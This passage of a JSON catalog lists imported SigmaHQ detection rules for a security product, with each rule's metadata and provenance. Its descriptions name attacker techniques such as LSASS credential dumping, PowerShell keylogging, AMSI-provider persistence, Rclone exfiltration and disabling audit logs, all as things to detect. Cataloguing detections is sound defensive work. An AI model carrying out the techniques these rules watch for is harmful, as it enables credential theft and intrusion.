"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" } }, { "id": "sigmahq-sigma-3390fbef-c98d-4bdd-a863-d65ed7c610dd", "type": "detection", "name": "New ODBC Driver Registered", "description": "Detects the registration of a new ODBC driver.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-odbc-driver-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3390fbef-c98d-4bdd-a863-d65ed7c610dd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml" } }, { "id": "sigmahq-sigma-33be4333-2c6b-44f4-ae28-102cdbde0a31", "type": "detection", "name": "Suspicious Msbuild Execution By Uncommon Parent Process", "description": "Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msbuild-execution-by-uncommon-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "33be4333-2c6b-44f4-ae28-102cdbde0a31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml" } }, { "id": "sigmahq-sigma-33d50d03-20ec-4b74-a74e-1e65a38af1c0", "type": "detection", "name": "AWS EKS Cluster Created or Deleted", "description": "Identifies when an EKS cluster is created or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-eks-cluster-created-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_eks_cluster_created_or_deleted.yml" } }, { "id": "sigmahq-sigma-33e814e0-1f00-4e43-9c34-31fb7ae2b174", "type": "detection", "name": "ESXi Network Configuration Discovery Via ESXCLI", "description": "Detects execution of the \"esxcli\" command with the \"network\" flag in order to retrieve information about the network configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033", "T1007", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-network-configuration-discovery-via-esxcli.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33e814e0-1f00-4e43-9c34-31fb7ae2b174", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml" } }, { "id": "sigmahq-sigma-33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "type": "detection", "name": "Potential Persistence Via New AMSI Providers - Registry", "description": "Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.\nAttackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.\nThis technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-new-amsi-providers-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml" } }, { "id": "sigmahq-sigma-33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "type": "detection", "name": "Lsass Full Dump 
Request Via DumpType Registry Settings", "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-full-dump-request-via-dumptype-registry-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" } }, { "id": "sigmahq-sigma-33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "type": "detection", "name": "WMI Persistence - Script Event Consumer File Write", "description": "Detects file writes of WMI script event consumer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-script-event-consumer-file-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" } }, { "id": "sigmahq-sigma-340a090b-c4e9-412e-bb36-b4b16fe96f9b", "type": "detection", "name": "Renamed ZOHO Dctask64 Execution", "description": "Detects a renamed \"dctask64.exe\" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.\nThis binary can be abused for DLL injection, arbitrary command and process execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1055.001", "T1202", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-zoho-dctask64-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml" } }, { "id": "sigmahq-sigma-340ee172-4b67-4fb4-832f-f961bdc1f3aa", "type": "detection", "name": "Password Reset By User Account", "description": "Detect when a user has reset their password in Azure AD", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-reset-by-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_user_password_change.yml" } }, { "id": "sigmahq-sigma-34275eb8-fa19-436b-b959-3d9ecd53fa1f", "type": "detection", "name": "Loaded Module Enumeration Via Tasklist.EXE", "description": "Detects the enumeration of a specific DLL or EXE being used by a binary via \"tasklist.exe\".\nThis is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.\nIn order to dump the process memory or perform other nefarious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/loaded-module-enumeration-via-tasklist-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34275eb8-fa19-436b-b959-3d9ecd53fa1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml" } }, { "id": "sigmahq-sigma-34746e8c-5fb8-415a-b135-0abc167e912a", "type": "detection", "name": "WinSxS Executable File Creation By Non-System Process", "description": "Detects the creation of binaries in the WinSxS folder by non-system processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winsxs-executable-file-creation-by-non-system-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34746e8c-5fb8-415a-b135-0abc167e912a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml" } }, { "id": "sigmahq-sigma-347906f3-e207-4d18-ae5b-a9403d6bcdef", "type": "detection", "name": "Netsh Allow Group Policy on Microsoft Defender Firewall", "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netsh-allow-group-policy-on-microsoft-defender-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" } }, { "id": "sigmahq-sigma-34979410-e4b5-4e5d-8cfb-389fdff05c12", "type": "detection", "name": "Remove Immutable File Attribute", "description": "Detects usage of the 'chattr' utility to remove immutable file attribute.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remove-immutable-file-attribute.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34979410-e4b5-4e5d-8cfb-389fdff05c12", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml" } }, { "id": "sigmahq-sigma-34986307-b7f4-49be-92f3-e7a4d01ac5db", "type": "detection", "name": "Rclone Config File Creation", "description": "Detects Rclone config files being created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rclone-config-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_rclone_config_files.yml" } }, { "id": "sigmahq-sigma-34aa0252-6039-40ff-951f-939fd6ce47d8", "type": "detection", "name": "Suspicious Keyboard Layout Load", "description": "Detects the keyboard preload installation with a 
suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-keyboard-layout-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34aa0252-6039-40ff-951f-939fd6ce47d8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" } }, { "id": "sigmahq-sigma-34d81081-03c9-4a7f-91c9-5e46af625cde", "type": "detection", "name": "Bitbucket Unauthorized Full Data Export Triggered", "description": "Detects when full data export is attempted an unauthorized user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1213.003", "T1586" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-unauthorized-full-data-export-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34d81081-03c9-4a7f-91c9-5e46af625cde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/application/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml" } }, { "id": "sigmahq-sigma-34e1c7d4-0cd5-419d-9f1b-1dad3f61018d", "type": "detection", "name": "Outdated Dependency Or Vulnerability Alert Disabled", "description": "Dependabot performs a scan to detect insecure dependencies, and sends Dependabot alerts.\nThis rule detects when an organization owner disables Dependabot alerts private repositories or Dependabot security updates for all repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1195.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outdated-dependency-or-vulnerability-alert-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34e1c7d4-0cd5-419d-9f1b-1dad3f61018d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_disabled_outdated_dependency_or_vulnerability.yml" } }, { "id": "sigmahq-sigma-34ebb878-1b15-4895-b352-ca2eeb99b274", "type": "detection", "name": "Suspicious Execution of Shutdown", "description": "Use of the commandline to shutdown or reboot windows", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34ebb878-1b15-4895-b352-ca2eeb99b274", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_shutdown_execution.yml" } }, { "id": "sigmahq-sigma-34f90d3c-c297-49e9-b26d-911b05a4866c", "type": "detection", "name": "Powershell Keylogging", "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1056.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-keylogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" } }, { "id": "sigmahq-sigma-350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "type": "detection", "name": "MSSQL Disable Audit Settings", "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-disable-audit-settings.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml" } }, { "id": "sigmahq-sigma-352a54e1-74ba-4929-9d47-8193d67aba1e", "type": "detection", "name": "Azure Domain Federation Settings Modified", "description": "Identifies when an user or application modified the federation settings on the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-domain-federation-settings-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "352a54e1-74ba-4929-9d47-8193d67aba1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_federation_modified.yml" } }, { "id": "sigmahq-sigma-352a918a-34d8-4882-8470-44830c507aa3", "type": "detection", "name": "Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure", "description": "Detects when an instance identity has taken an action that isn't inside SSM.\nThis can indicate that a compromised EC2 instance is being used as a pivot point.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078", 
"T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-usage-of-imds-credentials-outside-of-aws-infrastructure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "352a918a-34d8-4882-8470-44830c507aa3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml" } }, { "id": "sigmahq-sigma-3569aefd-e535-4391-8c18-24bd01a21eaf", "type": "detection", "name": "Suspicious Email Delivered In Microsoft 365", "description": "Detects instances where an email, identified as malicious or suspicious by the Microsoft Defender for Office 365 (formerly ATP) engine, was delivered to a user's Inbox or Junk folder.\nIt might indicate that a potential threat, such as a spearphishing attachment or links, has bypassed initial blocking mechanisms and reached an end-user, requiring further investigation and potential remediation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-email-delivered-in-microsoft-365.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3569aefd-e535-4391-8c18-24bd01a21eaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/cloud/m365/audit/microsoft365_suspicious_email_delivered.yml" } }, { "id": "sigmahq-sigma-35a05c60-9012-49b6-a11f-6bab741c9f74", "type": "detection", "name": "Wget Creating Files in Tmp Directory", "description": "Detects the use of wget to download content in a temporary directory such as \"/tmp\" or \"/var/tmp\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wget-creating-files-in-tmp-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35a05c60-9012-49b6-a11f-6bab741c9f74", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml" } }, { "id": "sigmahq-sigma-35b781cc-1a08-4a5a-80af-42fd7c315c6b", "type": "detection", "name": "Discovery Using AzureHound", "description": "Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.004", "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/discovery-using-azurehound.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"35b781cc-1a08-4a5a-80af-42fd7c315c6b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml" } }, { "id": "sigmahq-sigma-35ba1d85-724d-42a3-889f-2e2362bcaf23", "type": "detection", "name": "AD Privileged Users or Groups Reconnaissance", "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ad-privileged-users-or-groups-reconnaissance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_account_discovery.yml" } }, { "id": "sigmahq-sigma-35bc7e28-ee6b-492f-ab04-da58fcf6402e", "type": "detection", "name": "Windows Network Access Suspicious desktop.ini Action", "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-network-access-suspicious-desktop-ini-action.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" } }, { "id": "sigmahq-sigma-35c55673-84ca-4e99-8d09-e334f3c29539", "type": "detection", "name": "Remote Registry Lateral Movement", "description": "Detects remote RPC calls to modify the registry and possible execute code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-registry-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35c55673-84ca-4e99-8d09-e334f3c29539", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" } }, { "id": "sigmahq-sigma-35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "type": 
"detection", "name": "PowerShell Write-EventLog Usage", "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-write-eventlog-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" } }, { "id": "sigmahq-sigma-3603f18a-ec15-43a1-9af2-d196c8a7fec6", "type": "detection", "name": "System Integrity Protection (SIP) Disabled", "description": "Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). 
This technique is used in post-exploit scenarios.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1518.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-integrity-protection-sip-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3603f18a-ec15-43a1-9af2-d196c8a7fec6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_csrutil_disable.yml" } }, { "id": "sigmahq-sigma-360a1340-398a-46b6-8d06-99b905dc69d2", "type": "detection", "name": "Windows Defender Grace Period Expired", "description": "Detects the expiration of the grace period of Windows Defender. 
